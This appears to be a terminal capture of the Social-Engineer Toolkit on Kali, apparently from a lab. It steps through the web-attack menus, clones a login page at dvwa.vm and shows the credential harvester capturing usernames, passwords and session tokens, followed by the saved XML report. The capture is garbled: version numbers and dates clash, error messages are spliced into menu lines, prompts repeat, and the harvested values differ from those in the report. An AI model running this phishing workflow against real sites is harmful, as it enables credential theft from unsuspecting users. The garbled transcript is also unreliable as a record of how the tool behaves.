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File Actions Edit View Help

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
      By: TrustedSec
      Version: 8.0.3
      Codename: 'Maverick' (2015-12-16 15:01:01.557000,ml)
      Follow us on Twitter: @TrustedSec
      Follow me on Twitter: @HackingDave
      Homepage: https://www.trustedsec.com
      Welcome to the Social-Engineer Toolkit (SET).
      The one stop shop for all of your SE needs.

The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com

It's easy to update using the Pentesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!

Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

set> [
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[—]      The Social-Engineer Toolkit (SET) 15.15 [—]
[—]      Created by: David Kennedy (ReL1K) 15.01 [—]
[—]          Version: 0.9.3 [—]
[—]          Codename: Maverick [—]
[—]      Follow us on Twitter: @TrustedSec [—]
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Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

99) Return back to the main menu.

set> 

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The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

The Tabnabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then it is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method

99) Return to Main Menu

set:webattack>

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1) Java Applet Attack Method
2) Metasploit Browser Exploit Method [2-18 19:01:01.557900.xml]
3) Credential Harvester Attack Method
4) TabNabbing Method [2-18 19:01:01.557900.xml]: No such file or directory
5) web Jacking Attack Method [2-18 19:01:01.557900.xml]: No such file or directory
6) Multi-Attack Web Method
7) HTA Attack Method [2-18 19:01:01.557900.xml]

99) Return to Main Menu reports/2025-12-18 19:01:01.557900.xml"
set:webattack>3

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack. [2-18 19:01:01.557900.xml"]

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu [2-18 19:01:01.557900.xml"]
set:webattack>

```

File Actions Edit View Help

99) Return to Webattack Menu

set:webattack>2

[+] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report

— * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * —

The way that this works is by cloning a site and looking for form fields to rewrite. If the POST fields are not usual methods for posting forms this could fail. If it does, you can always save the HTML, rewrite the forms to be standard forms and use the "IMPORT" feature. Additionally, really important:

If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL IP address below, not your NAT address. Additionally, if you don't know basic networking concepts, and you have a private IP address, you will need to port forward the port that SET is using to your external IP address. A browser doesn't know how to communicate with a private IP address, so if you don't specify an external IP address if you are using this from an external perspective, it will not work. This isn't a SET issue this is how networking works.

Enter the IP Address for POST back in Harvester/Tabnabbing: 10.6.6.1

[+] Set supported HTTP Methods

[+] Target website http://www.thisisajstakest.com

set:webattack> Enter the url to clone:http://dvwa.vm

[*] Cloning the website: http://dvwa.vm

[*] This could take a little bit

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.

[*] Credential Harvester module Credential Harvester Attack

[*] Credential Harvester is running on port 80

[*] Information will be displayed to you as it arrives below:

[*] Would you like to attempt to stop Apache? [y/n]: Are you running Apache or NGINX?
Do you want to attempt to stop Apache? [y/n]: Are you running Apache or NGINX?
Stopping apache2 (via systemctl): apache2.service.
Stopping nginx (via systemctl): nginx.service.

[*] Successfully stopped Apache. Starting the credential harvester.

[*] Harvester has been started and is ready to browse to your site.

[*] [*] NOT A DICT. PRINTING THE OUTPUT

POSSIBLE USERNAME FIELD FOUND! username=trial@google.com

POSSIBLE PASSWORD FIELD FOUND! password=Password001

POSSIBLE USERNAME FIELD FOUND! username=dvwa

POSSIBLE USERNAME FIELD FOUND! user_token=751e39f0210a2b077ce3dc91a8d601a2

[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

10.6.6.1 - - [18/Dec/2025 20:45:24] "POST /index.html HTTP/1.1" 302 -

```
└──(root㉿Kali)-[~/home/kali]
    └──# cat /root/.set/reports/"2025-12-18 15:01:01.557900.xml"
<?xml version="1.0" encoding='UTF-8'?>
<harvester>
    URL=http://dvwa.vm
    <url>      <param>username=trial@gmail.com</param>
                <param>password=Password@01</param>
                <param>Login>Login</param>
                <param>user_token=761e39f0210a2b371ce36c91a4b68142</param>
            </url>
</harvester>

└──(root㉿Kali)-[~/home/kali]
    └──#
```